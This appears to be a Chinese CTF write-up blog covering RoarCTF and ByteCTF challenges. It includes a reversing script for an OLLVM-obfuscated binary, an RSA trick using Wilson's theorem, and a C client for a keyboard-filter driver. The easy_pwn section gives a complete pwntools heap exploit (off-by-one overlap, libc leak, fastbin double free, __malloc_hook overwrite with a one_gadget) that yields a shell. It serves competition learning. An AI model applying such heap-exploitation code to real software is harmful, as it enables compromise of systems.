Roarctf+Bytectf

Author Avatar
Xzhah 10月 22, 2019
  • 在其它设备中阅读本文章

[TOC]

RoarCTF

队里主要打hitcon,然而我唯一有点思路看得懂的re被哥哥们秒了,每当hitcon的题目看崩溃的时候就做做roarctf的题,结果还拿了个逆向二血。。。还有一个只三队做出的re非预期解后面单独发

polyre

加了ollvm,去混淆后白给

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
'''c1=0xBC8FF26D43536296
c1=0x7b46544372616f52'''
#for i in range(64):
# c1=(c1*4)&0xffffffffffffffff
# c1=(c1^0xB0004B7679FA26B3)&0xffffffffffffffff
#print hex(c1)
c1=0xBC8FF26D43536296#0x55759f81a2c68ae4
#c1=0xe06ce20c12db1735L
for i in range(64):
tmp=c1
if(tmp&1==1):
c1=(c1^0xB0004B7679FA26B3)
c1=(c1>>1)
c1=c1|0x8000000000000000
#print hex(c1),i
if(tmp&1==0):
#print hex(c1)
c1=(c1>>1)&0x7fffffffffffffff
#print hex(c1),i
print c1
#ff6{galf c6-09392 flag{6ff29390-6c20-4c56-ba70-a95758e3d1f8}
print hex(c1)[2:-1].decode('hex')
c1=0x7b46544372616f52
for i in range(64):
if(c1&0x8000000000000000==0):
#print hex(c1),64-i
c1=(c1*2)&0xffffffffffffffff
else:
#print hex(c1),64-i
c1=(c1*2)&0xffffffffffffffff
c1=(c1^0xB0004B7679FA26B3)&0xffffffffffffffff

babyrsa

主要考点在B! %A(A和B都很大,但是相近)

用威尔逊定理可以求得,然后flag就有了

1.png

pwn

easy_pwn

off_by_one + overlop

参考学弟给的图,基本上就是这题的做法了

2.png

最终double free过后可以写malloc_hook(构造malloc_hook地址的时候有所偏移,要保证size刚好是0x7x)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
from pwn import *
#context.log_level = 'debug'
p = process('./easy_pwn')
def add(size):
p.recvuntil('choice: ')
p.sendline('1')
p.recvuntil('size: ')
p.sendline(str(size))
def edit(idx, size, data):
p.recvuntil('choice: ')
p.sendline('2')
p.recvuntil('index: ')
p.sendline(str(idx))
p.recvuntil('size: ')
p.sendline(str(size))
p.recvuntil('content: ')
p.send(data)
def remove(idx):
p.recvuntil('choice: ')
p.sendline('3')
p.recvuntil('index: ')
p.sendline(str(idx))
def show(idx):
p.recvuntil('choice: ')
p.sendline('4')
p.recvuntil('index: ')
p.sendline(str(idx))
add(0x28) #0
add(0x100) #1
add(0x100) #2
gdb.attach(p)
edit(1, 0xf8, '\x00'*0xf0 + p64(0x100))
remove(1)
edit(0, 0x28+10, '\x00'*0x29)
add(0x80) #1
add(0x60) #3
remove(1)
remove(2)
add(0x80) #1
add(0x100) #2
add(0x20) #4
remove(2)
show(3)
p.recvuntil('content: ')
libc_base = u64(p.recvn(6).ljust(8, '\x00')) - 0x3c4b78
one_gadget = libc_base + 0xf02a4
malloc_hook = libc_base + 0x3c4afd
success("libc_base: %#x" % libc_base)
add(0x60) #2
add(0x60) #5
remove(2)
remove(5)
remove(3)
add(0x60) #2
edit(2, 8, p64(malloc_hook))
add(0x60) #3
add(0x60) #5
add(0x60) #6
edit(6, 11, 'a'*3 + p64(one_gadget))
remove(2)
remove(5)
#gdb.attach(p)
p.interactive()

ByteCTF

2333 第一次做驱动题,环境都是现问的朋友现搭的

是一个键盘过滤

注意一些需要patch的地方,比如一些反调试,0xDEADBEEF,这个最后似乎也没用上,可以直接nop,Fake_Intel,拿去算md5的值了,md5值拿去做aes的密钥了

然后根据你的键盘输入生成code,然而题目直接给了code,所以直接改内存值就好了。

最后code拿去参与aes的运算,再写个ring3通信的程序,就可以读出flag。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
// ConsoleApplication11.cpp: 定义控制台应用程序的入口点。
//
#include<stdio.h>
#include <windows.h>
//#include "stdafx.h"
#define DEVICE_LINK_NAME L"\\\\.\\DancingKeys"
//#define CTL_SYS \
// CTL_CODE(FILE_DEVICE_UNKNOWN,0x222404,METHOD_BUFFERED,FILE_ANY_ACCESS)
int main()
{
HANDLE DeviceHandle = CreateFile(DEVICE_LINK_NAME,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (DeviceHandle == INVALID_HANDLE_VALUE)
{
return 0;
}
char *BufferData = NULL;
BufferData = (char *)malloc(sizeof(char) * 0x100);
char InBufferData[5] = { '1' ,'2','3','4','5'};
//InBufferData = (char *)malloc(sizeof(char) * 0x100);
DWORD ReturnLength = 0;
int IsOk = DeviceIoControl(DeviceHandle, 0x222404,
(LPVOID)InBufferData,
0,
(LPVOID)BufferData,
0x64,
&ReturnLength,
NULL);
printf("%d\n", IsOk);
printf("%d\n", ReturnLength);
for (int i = 0; i < 100; i++)
printf("%c ", BufferData[i]);
//printf("%s\n", InBufferData);
if (DeviceHandle != NULL)
{
CloseHandle(DeviceHandle);
DeviceHandle = NULL;
}
printf("Input AnyKey To Exit\r\n");
getchar();
return 0;
}
3.png